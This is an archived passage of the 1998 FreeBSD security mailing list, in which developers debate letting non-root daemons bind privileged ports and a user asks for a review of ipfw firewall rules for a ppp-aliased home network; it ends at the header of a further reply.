abc@ralph.ml.org, tqbf@secnet.com Subject: Re: bsd securelevel patch question In-reply-to: Your message of "Thu, 02 Jul 1998 16:56:14 -0000." <199807021556.QAA00294@indigo.ie> Date: Thu, 02 Jul 1998 19:04:48 +0200 Message-ID: <2755.899399088@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <199807021556.QAA00294@indigo.ie>, Niall Smart writes: >On Jul 2, 5:35pm, Poul-Henning Kamp wrote: >} Subject: Re: bsd securelevel patch question >> >> >I still agree with you for other reasons though, if an attacker >> >creates a new service people might use it even though it isn't a >> >legitimate service setup my the sysadmin. >> >> Right, but if the attacker has hacked your system enough to bind >> to a socket < 1024, he >OWNS< it. Any further attempt at adding >> security is bogus, and can at best OPEN the window more because >> you will be adding more complexity, rather than subtract from it. > >Thats not true, if he hacks the user/group that the web server runs >at then he only owns the web server, the only additional priviledge >he gains is the ability to bind to port 80. which is worse that the standard: he cannot bind to any port < 1024. -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." "ttyv0" -- What UNIX calls a $20K state-of-the-art, 3D, hi-res color terminal To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 10:31:48 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA01676 for freebsd-security-outgoing; Thu, 2 Jul 1998 10:31:48 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (nsmart@ts01-55.waterford.indigo.ie [194.125.139.118]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA01653 for ; Thu, 2 Jul 1998 10:31:43 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id SAA00883; Thu, 2 Jul 1998 18:23:39 +0100 (IST) (envelope-from rotel@indigo.ie) From: Niall Smart Message-Id: <199807021723.SAA00883@indigo.ie> Date: Thu, 2 Jul 1998 18:23:39 +0000 In-Reply-To: Poul-Henning Kamp "Re: bsd securelevel patch question" (Jul 2, 7:04pm) Reply-To: rotel@indigo.ie X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: Poul-Henning Kamp , rotel@indigo.ie Subject: Re: bsd securelevel patch question Cc: "Allen Smith" , dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 2, 7:04pm, Poul-Henning Kamp wrote: } Subject: Re: bsd securelevel patch question > > > >Thats not true, if he hacks the user/group that the web server runs > >at then he only owns the web server, the only additional priviledge > >he gains is the ability to bind to port 80. > > which is worse that the standard: he cannot bind to any port < 1024. Well, this depends on how the server runs, if it binds to the port and then setuid()'s to a lower priviledge then this is true. There are clients out there that are purely setuid just so they can bind to a port < 1024 however, so it has valid uses. Niall -- Niall Smart. PGP: finger njs3@motmot.doc.ic.ac.uk FreeBSD: Turning PC's into Workstations: www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 10:52:35 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id KAA05124 for freebsd-security-outgoing; Thu, 2 Jul 1998 10:52:35 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id KAA05020 for ; Thu, 2 Jul 1998 10:52:18 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199807021752.KAA05020@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA279381887; Fri, 3 Jul 1998 03:51:27 +1000 From: Darren Reed Subject: Re: bsd securelevel patch question To: rotel@indigo.ie Date: Fri, 3 Jul 1998 03:51:27 +1000 (EST) Cc: easmith@beatrice.rutgers.edu, dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com In-Reply-To: <199807021331.OAA00656@indigo.ie> from "Niall Smart" at Jul 2, 98 02:31:18 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Niall Smart, sie said: > > Whats wrong with a /dev/socket/tcp/XYZ acl type scheme? If the > process has permission to read /dev/socket/tcp/83 then they can > bind to port 83, you could make it a procfs type filesystem so all > the ACL information was in memory for speed. Then you've got to > save/restore state though. you already have /dev/socket/tcp/XYZ using portals. why reinvent that wheel again ? you (and others) seem very keen on doing this. maybe you should do some more research about what's around now before taking this much further. darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Thu Jul 2 11:16:07 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id LAA09566 for freebsd-security-outgoing; Thu, 2 Jul 1998 11:16:07 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from indigo.ie (root@ts01-55.waterford.indigo.ie [194.125.139.118]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id LAA09484 for ; Thu, 2 Jul 1998 11:15:35 -0700 (PDT) (envelope-from rotel@indigo.ie) Received: (from nsmart@localhost) by indigo.ie (8.8.8/8.8.7) id SAA00883; Thu, 2 Jul 1998 18:23:39 +0100 (IST) (envelope-from rotel@indigo.ie) From: Niall Smart Message-Id: <199807021723.SAA00883@indigo.ie> Date: Thu, 2 Jul 1998 18:23:39 +0000 In-Reply-To: Poul-Henning Kamp "Re: bsd securelevel patch question" (Jul 2, 7:04pm) Reply-To: rotel@indigo.ie X-Mailer: Mail User's Shell (7.2.6 beta(3) 11/17/96) To: Poul-Henning Kamp , rotel@indigo.ie Subject: Re: bsd securelevel patch question Cc: "Allen Smith" , dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 2, 7:04pm, Poul-Henning Kamp wrote: } Subject: Re: bsd securelevel patch question > > > >Thats not true, if he hacks the user/group that the web server runs > >at then he only owns the web server, the only additional priviledge > >he gains is the ability to bind to port 80. > > which is worse that the standard: he cannot bind to any port < 1024. Well, this depends on how the server runs, if it binds to the port and then setuid()'s to a lower priviledge then this is true. There are clients out there that are purely setuid just so they can bind to a port < 1024 however, so it has valid uses. Niall -- Niall Smart. PGP: finger njs3@motmot.doc.ic.ac.uk FreeBSD: Turning PC's into Workstations: www.freebsd.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri Jul 3 02:03:42 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA15898 for freebsd-security-outgoing; Fri, 3 Jul 1998 02:03:42 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA15893 for ; Fri, 3 Jul 1998 02:03:40 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id FAA07815; Fri, 3 Jul 1998 05:01:45 -0400 (EDT) From: "Allen Smith" Message-Id: <9807030501.ZM7814@beatrice.rutgers.edu> Date: Fri, 3 Jul 1998 05:01:44 -0400 In-Reply-To: andrew@squiz.co.nz (Andrew McNaughton) "Re: bsd securelevel patch question" (Jul 3, 4:26am) References: X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: andrew@squiz.co.nz (Andrew McNaughton) Cc: Allen Smith , dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com, phk@critter.freebsd.dk Subject: Re: bsd securelevel patch question Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 3, 4:26am, Andrew McNaughton (possibly) wrote: > >Eh? If ssh/smtp/inetd bind to the port you won't be able to, no > >matter how often you try. > > Unless the server is restarted for some reason. hence the rapid cron job > which will eventually succeed if not detected first. Quite; sorry I wasn't clearer, but I forgot that others might not realize that. Notice, for instance, that named comes with a script for such restarting - implying there's a frequent enough need for such that it's likely to come up. (It's also the case that currently sendmail and some other stuff gets started _after_ cron, but that can be taken care of via rearranging the /etc/rc.* files.) Another example is squid, which can be run as a http accelerator; it comes with a RunAccel script that restarts squid whenever it crashes - and crashes could be induced by an attacker. > >And you won't be able to steal keys > >by hijacking sshd. > > If the trojan gets to tell the other end what public key to use, > then of course it can get at the data stream. This is equally true > with routing/man-in-the-middle attacks. Without access to > master.passwd though it can't do a very good job of masquerading as > an authentication agent. It will fail to emulate any authentication > unless that can be done by accepting any connection regardless. I > don't know enough about the authentication systems ssh uses to know > which if any are vulnerable here. All it has to do to act as an authentication agent for password sniffing purposes is use telnetd or login. One ssh mode is to essentially act as an encrypted telnet, with normal password authentication. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri Jul 3 02:30:02 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA20963 for freebsd-security-outgoing; Fri, 3 Jul 1998 02:30:02 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA20910 for ; Fri, 3 Jul 1998 02:29:57 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id FAA08134; Fri, 3 Jul 1998 05:26:58 -0400 (EDT) From: "Allen Smith" Message-Id: <9807030526.ZM8133@beatrice.rutgers.edu> Date: Fri, 3 Jul 1998 05:26:58 -0400 In-Reply-To: Darren Reed "Re: bsd securelevel patch question" (Jul 3, 3:51am) References: <01IYXE91JSKI008EO4@AESOP.RUTGERS.EDU> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: Darren Reed , rotel@indigo.ie Subject: Re: bsd securelevel patch question Cc: dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 3, 3:51am, Darren Reed (possibly) wrote: > In some mail from Niall Smart, sie said: > > > > Whats wrong with a /dev/socket/tcp/XYZ acl type scheme? If the > > process has permission to read /dev/socket/tcp/83 then they can > > bind to port 83, you could make it a procfs type filesystem so all > > the ACL information was in memory for speed. Then you've got to > > save/restore state though. > > you already have /dev/socket/tcp/XYZ using portals. > > why reinvent that wheel again ? There are three possible ways of doing things here: A. as Niall appears to be suggesting, have programs using the current syscalls, library routines, etcetera to do sockets, with permissions being determined by files B. use portals, with either editing programs to now use open or modifying the library, etcetera code to do this for them C. use another permissions mechanism (privileges, possibly via groups) A is a nice idea for configurability but is likely to be slow. B is also nice for configurability, appears possibly to be less slow, but will be rather headachy in either translating or library etc modifications. C is the option I'm favoring. > you (and others) seem very keen on doing this. maybe you should do > some more research about what's around now before taking this much > further. I've been trying to do so; thank you for opening up ftp access to the mount_portal code you've modified. The listen-only aspect is one thing that I've been looking at, for safety with rsh et al. Any suggestions as to other places to look at? -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri Jul 3 02:47:56 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA24545 for freebsd-security-outgoing; Fri, 3 Jul 1998 02:47:56 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA24524 for ; Fri, 3 Jul 1998 02:47:45 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id FAA08315; Fri, 3 Jul 1998 05:41:03 -0400 (EDT) From: "Allen Smith" Message-Id: <9807030541.ZM8314@beatrice.rutgers.edu> Date: Fri, 3 Jul 1998 05:41:03 -0400 In-Reply-To: Niall Smart "Re: bsd securelevel patch question" (Jul 2, 6:23pm) References: <199807021723.SAA00883@indigo.ie> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: rotel@indigo.ie, Poul-Henning Kamp Subject: Re: bsd securelevel patch question Cc: dg@root.com, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 2, 6:23pm, Niall Smart (possibly) wrote: > On Jul 2, 7:04pm, Poul-Henning Kamp wrote: > } Subject: Re: bsd securelevel patch question > > > > > >Thats not true, if he hacks the user/group that the web server runs > > >at then he only owns the web server, the only additional priviledge > > >he gains is the ability to bind to port 80. > > > > which is worse that the standard: he cannot bind to any port < 1024. There is also the question of whether one prefers: A. a server that sometimes runs as root and sometimes not, which gives the possibility that someone may take root; or B. a server that always runs as a user with one privilege, and is otherwise the same as an ordinary user. Given the nasty possibilities inherent in a root takeover, I prefer the latter if these are the only choices. > Well, this depends on how the server runs, if it binds to the port > and then setuid()'s to a lower priviledge then this is true. There > are clients out there that are purely setuid just so they can bind > to a port < 1024 however, so it has valid uses. There is also the option of having the server be run as a setuid binary by the less-privileged user, in which case (using the setuid/group (or a similar setuid/privilege) scheme I outlined earlier) it will when resetting its effective uid to its real uid remove the privileges in question. Admittedly, causing servers not running as root to do this may require some rewriting; many assume that they can't (or at least shouldn't) reset their euid when the euid isn't root, and that there's no need to reset their euid back to anything but root. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri Jul 3 02:55:21 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id CAA26164 for freebsd-security-outgoing; Fri, 3 Jul 1998 02:55:21 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id CAA26159 for ; Fri, 3 Jul 1998 02:55:17 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id FAA08447; Fri, 3 Jul 1998 05:53:35 -0400 (EDT) From: "Allen Smith" Message-Id: <9807030553.ZM8446@beatrice.rutgers.edu> Date: Fri, 3 Jul 1998 05:53:35 -0400 In-Reply-To: David Greenman "Re: bsd securelevel patch question" (Jul 2, 9:00am) References: <199807021600.JAA24882@implode.root.com> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: dg@root.com, rotel@indigo.ie Subject: Re: bsd securelevel patch question Cc: security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 2, 9:00am, David Greenman (possibly) wrote: > Um, well, let's talk about FTP servers, then, since those do a privileged > bind() for every data connection that is estabilished (one per file > transfer). Good point. The various examples here are pointing out something: in most cases, and so far as I know in all of the most frequent cases, it's only necessary to be able to bind to _one_ privileged port. (By 'the most frequent cases', I'm referring to that while the FTP server has to bind to both port 20 and port 21, the latter is far more frequent than the former - the first just happens when starting up a new daemon (and is usually done by inetd in any event).) This implies that one way to speed things up would be to have as extra fields in a privilege structure (or as part of the ucred structure) the main tcp or udp port the process is permitted to bind to. In this way, one would simply check: A. does the process have the PRIV_TCP (or PRIV_UDP) privilege; B. if so, is the port in the privilege/ucred structure equal to the requested one (with a 0 meaning none has been established)? If so, allow C. if not, do whatever scanning is necessary to figure out if the port is allowable; if it is, then put that port # in the privilege/ucred structure -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri Jul 3 03:29:06 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id DAA00934 for freebsd-security-outgoing; Fri, 3 Jul 1998 03:29:06 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from implode.root.com (implode.root.com [198.145.90.17]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id DAA00929 for ; Fri, 3 Jul 1998 03:29:03 -0700 (PDT) (envelope-from root@implode.root.com) Received: from implode.root.com (localhost [127.0.0.1]) by implode.root.com (8.8.5/8.8.5) with ESMTP id DAA06648; Fri, 3 Jul 1998 03:28:10 -0700 (PDT) Message-Id: <199807031028.DAA06648@implode.root.com> To: "Allen Smith" cc: rotel@indigo.ie, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Subject: Re: bsd securelevel patch question In-reply-to: Your message of "Fri, 03 Jul 1998 05:53:35 EDT." <9807030553.ZM8446@beatrice.rutgers.edu> From: David Greenman Reply-To: dg@root.com Date: Fri, 03 Jul 1998 03:28:10 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >On Jul 2, 9:00am, David Greenman (possibly) wrote: > >> Um, well, let's talk about FTP servers, then, since those do a privileged >> bind() for every data connection that is estabilished (one per file >> transfer). > >Good point. The various examples here are pointing out something: in >most cases, and so far as I know in all of the most frequent cases, >it's only necessary to be able to bind to _one_ privileged port. (By >'the most frequent cases', I'm referring to that while the FTP server >has to bind to both port 20 and port 21, the latter is far more >frequent than the former - the first just happens when starting up a >new daemon (and is usually done by inetd in any event).) This implies >that one way to speed things up would be to have as extra fields in a >privilege structure (or as part of the ucred structure) the main tcp >or udp port the process is permitted to bind to. In this way, one >would simply check: > A. does the process have the PRIV_TCP (or PRIV_UDP) privilege; > B. if so, is the port in the privilege/ucred structure equal > to the requested one (with a 0 meaning none has been > established)? If so, allow > C. if not, do whatever scanning is necessary to figure out if > the port is allowable; if it is, then put that port # in > the privilege/ucred structure Okay, so you are saying that the PRIV_* port privileges would be honored only for the first privileged port number that is bind()'ed [sic]? Hmmm...sounds interesting. I like that a lot better than assigning 1024 gids to TCP, another 1024 gids to UDP, etc. -DG David Greenman Co-founder/Principal Architect, The FreeBSD Project To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri Jul 3 05:14:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA19505 for freebsd-security-outgoing; Fri, 3 Jul 1998 05:14:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from beatrice.rutgers.edu (beatrice.rutgers.edu [165.230.209.143]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA19486 for ; Fri, 3 Jul 1998 05:14:35 -0700 (PDT) (envelope-from easmith@beatrice.rutgers.edu) Received: (from easmith@localhost) by beatrice.rutgers.edu (980427.SGI.8.8.8/970903.SGI.AUTOCF) id IAA10158; Fri, 3 Jul 1998 08:12:54 -0400 (EDT) From: "Allen Smith" Message-Id: <9807030812.ZM10157@beatrice.rutgers.edu> Date: Fri, 3 Jul 1998 08:12:54 -0400 In-Reply-To: David Greenman "Re: bsd securelevel patch question" (Jul 3, 3:28am) References: <199807031028.DAA06648@implode.root.com> X-Mailer: Z-Mail (3.2.3 08feb96 MediaMail) To: dg@root.com Subject: Re: bsd securelevel patch question Cc: rotel@indigo.ie, security@FreeBSD.ORG, njs3@doc.ic.ac.uk, dima@best.net, abc@ralph.ml.org, tqbf@secnet.com Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Jul 3, 3:28am, David Greenman (possibly) wrote: > Okay, so you are saying that the PRIV_* port privileges would be > honored only for the first privileged port number that is > bind()'ed [sic]? Hmmm...sounds interesting. I like that a lot > better than assigning 1024 gids to TCP, another 1024 gids to UDP, > etc. Actually, I'd just had in mind this as a means of speeding up (via caching) the port allowability determination (yes, I've listened to what you've commented regarding the speed of scanning the potentially large group set), but the further notion that you bring up has some definite possibilities. From my look-over of kern_fork.c, the ucred structure (which is where I'd have in mind placing this) is essentially copied from parent to child, so that'll insure that a child process can't choose a new port to bind to. The addition of syscalls to check and set the ports in question would be an additional security measure for doing stuff via login.conf, as you had suggested earlier (i.e., while either login.conf or (as I'd prefer) groups could be used for setting the basic privileges, login.conf could be used for setting which port a given PRIV_TCP or PRIV_UDP uid-derived process could bind to). While this combination isn't as secure for setuid binaries as the gid-to-port mapping I'd mentioned earlier, it does have the advantage that you point out of not occupying large slices of the gid space. OTOH, I certainly am not a security expert, so there could be something I'm missing. Hmm... I just looked over (further) the libutil source code, and it doesn't look that difficult to add this functionality into (namely into functions called by setusercontext). How would LOGIN_SETPRIV be as the applicable flag? I'm thinking that this would be definitely appropriate for having available to a class (via setclasscontext), since it'd be overridable by individual user entries anyway. Incidentally, how much differences are there between -stable and -current on stuff concerned with this? The main system I have to work with is running -stable, and that's not likely to change, for reliability reasons. I may be able to get a spare computer running -current, but that really can't take priority - it's not what I'm paid for, whereas getting the firewall computer (which is -stable) running (indirectly) is. I do have around a copy of /usr/src/sys -current that's updated whenever the main system is, which I can use for at least making sure the patches go in properly and that the kernel will compile. -Allen -- Allen Smith easmith@beatrice.rutgers.edu To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri Jul 3 19:03:46 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id TAA23098 for freebsd-security-outgoing; Fri, 3 Jul 1998 19:03:46 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from sunra.csci.unt.edu (sunra.csci.unt.edu [129.120.3.43]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id TAA23093 for ; Fri, 3 Jul 1998 19:03:41 -0700 (PDT) (envelope-from louie@sunra.csci.unt.edu) Received: (from louie@localhost) by sunra.csci.unt.edu (8.8.7/8.8.7) id UAA20374 for freebsd-security@FreeBSD.ORG; Fri, 3 Jul 1998 20:58:16 -0500 (CDT) (envelope-from louie) Date: Fri, 3 Jul 1998 20:58:16 -0500 (CDT) From: Louie Message-Id: <199807040158.UAA20374@sunra.csci.unt.edu> To: freebsd-security@FreeBSD.ORG Subject: ipfw with ppp -alias setup Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I'm using userland ppp with packet aliasing to give a private address IP network (192.168.1.x on ed0) Internet access through a dialup ISP that assigns dynamic IP addresses. This works. I'm also using ipfw for packet filtering. This also works but since I don't claim to be a security expert I'm not sure if I've set this up properly. I'm using ipfw instead of ppp's packet filtering because I prefer ipfw's log output. (Maybe not a good reason.) My intentions are to block just about everything from the Internet. (Call me paranoid.) I've also tried to define an ipfw rule list using just interface names since the IP addresses my ISP assigns can vary over multiple class C networks. I also don't want to have to rerun ipfw every time I make a new connection with my ISP. Enough background. My question is, will this rule list work or have I just proved I don't know what I'm doing? # ipfw list 01000 allow ip from any to any via lo0 01010 deny ip from 127.0.0.0/8 to 127.0.0.0/8 01110 deny log ip from 192.168.0.0/16 to any in recv tun0 01210 deny log ip from 172.16.0.0/12 to any in recv tun0 01310 deny log ip from 10.0.0.0/8 to any in recv tun0 01410 allow tcp from any to any in recv tun0 established 01510 deny log tcp from any to any in recv tun0 setup 01610 allow tcp from any to any out xmit tun0 01710 allow tcp from any to any via ed0 01810 allow udp from any 53 to any 01910 allow udp from any to any 53 02010 allow icmp from any to any icmptype 0 02110 allow icmp from any to any icmptype 3 02210 allow icmp from any to any icmptype 8 02310 allow icmp from any to any icmptype 11 65535 deny ip from any to any Thanks for your time, Louie To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri Jul 3 20:12:12 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA00386 for freebsd-security-outgoing; Fri, 3 Jul 1998 20:12:12 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from shell6.ba.best.com (jkb@shell6.ba.best.com [206.184.139.137]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA00367 for ; Fri, 3 Jul 1998 20:12:02 -0700 (PDT) (envelope-from jkb@best.com) Received: from localhost (jkb@localhost) by shell6.ba.best.com (8.9.0/8.9.0/best.sh) with SMTP id UAA29660; Fri, 3 Jul 1998 20:11:59 -0700 (PDT) X-Authentication-Warning: shell6.ba.best.com: jkb owned process doing -bs Date: Fri, 3 Jul 1998 20:11:59 -0700 (PDT) From: "Jan B. Koum " X-Sender: jkb@shell6.ba.best.com To: Louie cc: freebsd-security@FreeBSD.ORG Subject: Re: ipfw with ppp -alias setup In-Reply-To: <199807040158.UAA20374@sunra.csci.unt.edu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 3 Jul 1998, Louie wrote: >I'm using userland ppp with packet aliasing to give a private >address IP network (192.168.1.x on ed0) Internet access through a >dialup ISP that assigns dynamic IP addresses. This works. I'm >also using ipfw for packet filtering. This also works but since >I don't claim to be a security expert I'm not sure if I've set this >up properly. I'm using ipfw instead of ppp's packet filtering >because I prefer ipfw's log output. (Maybe not a good reason.) >My intentions are to block just about everything from the Internet. >(Call me paranoid.) I've also tried to define an ipfw rule list >using just interface names since the IP addresses my ISP assigns >can vary over multiple class C networks. I also don't want to have >to rerun ipfw every time I make a new connection with my ISP. > >Enough background. My question is, will this rule list work or >have I just proved I don't know what I'm doing? > ># ipfw list >01000 allow ip from any to any via lo0 >01010 deny ip from 127.0.0.0/8 to 127.0.0.0/8 >01110 deny log ip from 192.168.0.0/16 to any in recv tun0 ^^^^^^ Aren't you using 192.168.1.0/16 as you mentioned above? >01210 deny log ip from 172.16.0.0/12 to any in recv tun0 >01310 deny log ip from 10.0.0.0/8 to any in recv tun0 >01410 allow tcp from any to any in recv tun0 established >01510 deny log tcp from any to any in recv tun0 setup >01610 allow tcp from any to any out xmit tun0 >01710 allow tcp from any to any via ed0 >01810 allow udp from any 53 to any >01910 allow udp from any to any 53 >02010 allow icmp from any to any icmptype 0 >02110 allow icmp from any to any icmptype 3 >02210 allow icmp from any to any icmptype 8 >02310 allow icmp from any to any icmptype 11 >65535 deny ip from any to any I'd also do: ipfw add 65534 deny log ip from any to any This way if you will see something not working you will have a log to debug. For example, your ftp will not work -- you'll have to use passive ftp. Else you gonna see server trying to connect to your port 40000+ (if I remember correctly) from it's port 20. If you dont' wan't to use passive ftp, then ipfw add 1509 allow tcp from any 20 to any 40000-40100 in recv tun0 ^^^^ Notice how it should be before 1510. Also, you have to add incoming port and not just "... from any 20 to any" since if I am root, I can claim to be from port 20. :) AFAICT the rules look ok. Really paranoid people might just take out icmp (think Phrack issue 51 article 6). But yeah, everything looks fine. Add the "deny log" rule before last one if you want. I am sure if I missed something people here will correct me. -- Yan Jan Koum jkb@best.com | "Turn up the lights; I don't want www.FreeBSD.org -- The Power to Serve | to go home in the dark." ---------------------------------------+----------------------------------- ICMP: What happens when you hack into a military network and they catch you. > >Thanks for your time, >Louie > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri Jul 3 23:52:41 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA17490 for freebsd-security-outgoing; Fri, 3 Jul 1998 23:52:41 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from infowest.com (infowest.com [204.17.177.10]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA17477 for ; Fri, 3 Jul 1998 23:52:39 -0700 (PDT) (envelope-from agifford@infowest.com) Received: from infowest.com (liberty.infowest.com [207.49.60.254]) by infowest.com (8.8.8/8.8.8) with ESMTP id AAA14261; Sat, 4 Jul 1998 00:50:55 -0600 (MDT) Message-ID: <359DD0C3.B683728B@infowest.com> Date: Sat, 04 Jul 1998 00:50:43 -0600 From: "Aaron D. Gifford" X-Mailer: Mozilla 4.05 [en] (X11; U; FreeBSD 2.2.6-STABLE i386) MIME-Version: 1.0 To: Louie CC: security@FreeBSD.ORG 